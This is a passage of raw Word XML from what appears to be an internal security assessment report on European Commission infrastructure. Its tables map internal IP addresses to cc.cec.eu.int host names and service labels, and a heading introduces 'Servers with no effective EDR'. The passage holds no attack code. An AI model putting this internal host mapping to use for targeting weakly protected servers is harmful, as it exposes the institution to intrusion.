            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="44F36737" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.136.163</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48CB940E" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd11760.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="44FBA637"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0524709D"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6200E856" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CH-TI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57DE1903"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6D2FB7D5" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="05BC1248" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.180.166</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B161306" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03831.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="38E48FDE"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33700473"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6B679095" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>FGAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F22980A"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7D104F05" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5AAC5E7D" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.180.165</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21B1C1D8" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03829.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3B664C8B"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5E933880"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50EB75B1" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>ODS.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="740EF66B"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6720453B" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="75B45F3C" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.180.159</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23B67AB5" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03803.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2A8E399D"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2D44F6EE"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49C1D975" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUTL PUBLIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CC044E8"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60E64C2C" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5C0CD72D" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.136.40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73A7C504" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd01981.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="063E2B55"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1A111F8B"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1DF3CBCC" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUTL PUBLIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CDE22B5"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675F9428" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7E052CB1" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.132.27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2790740B" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>muss.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6BC099A4"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56D32C00"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7E4BECEA" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUCR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41CCC2F2"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0B2BC2EF" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="58C39EFE" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.133.35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63B755A8" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>fardia.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0B5DF0A4"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2DE5788E"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574EA32C" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUCR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ED6A2AD" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Only T3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B3751" w:rsidRPr="001019D3" w14:paraId="4562ADE8" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="28E1F682" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.131.119</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FBAAF17" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03450.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="37DC0BB4"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0FB9C618"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64F1480E" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="176629EA" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Both</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B3751" w:rsidRPr="001019D3" w14:paraId="673E8351" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="75B66416" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.134.65</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="712A92C8" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03459.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="094DE6FD" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="787" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0CA333C8" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="946" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C063826" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45A5085C" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Both</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="615FD06F" w14:textId="77777777" w:rsidR="00A41ABF" w:rsidRPr="001019D3" w:rsidRDefault="00A41ABF" w:rsidP="00A41ABF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="255" w:name="_Ref213159717"/>
      <w:bookmarkStart w:id="256" w:name="_Toc213253587"/>
      <w:bookmarkEnd w:id="254"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Servers with no effective EDR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="249"/>
      <w:bookmarkEnd w:id="250"/>
      <w:bookmarkEnd w:id="255"/>
      <w:bookmarkEnd w:id="2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80" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1531"/>
        <w:gridCol w:w="2297"/>
        <w:gridCol w:w="867"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="2615"/>
      </w:tblGrid>
      <w:tr w:rsidR="00221B72" w:rsidRPr="001019D3" w14:paraId="218D9636" w14:textId="0B804372" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="340"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A8A8515" w14:textId="6D9BBB81" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00221B72">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36BEF023" w14:textId="4FD810E3" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00221B72">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>FQDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BB5A588" w14:textId="2F0CBA38" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>DG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="818" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0306D6F7" w14:textId="1650C373" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Environment</w:t>
